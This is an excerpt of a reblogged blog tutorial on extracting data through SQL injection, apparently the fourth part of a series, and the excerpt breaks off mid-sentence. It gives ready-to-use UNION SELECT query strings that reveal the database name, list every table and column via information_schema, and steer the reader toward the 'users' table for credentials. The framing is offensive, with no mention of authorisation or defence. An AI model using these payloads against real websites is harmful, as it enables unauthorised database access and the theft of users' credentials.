SQL Injection: Extracting Data

Freedom Computing Alliance


1: Definition

2: Targeting and Testing

3: Accessing the Database

4: Extracting Data

At this point you can now start pulling useful data from the server. First of all try finding out the name of the current database using the following query string format:

id=-123 union select 1,2,concat(database()),4,5,6–

Use the following query string format to display the names of all the tables in the current database:

id=-123 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()–

Note the order of these tables, as it will help comprehend your result from the next query.

Change the query string to now ask for all the column names from all the tables:

id=-123 union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_schema=database()–

You can now take your pick of data, the most useful data is probably in the “users” table, or something similarly named. Looking at the column names you may see various ID, username and…

View original post 92 more words


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s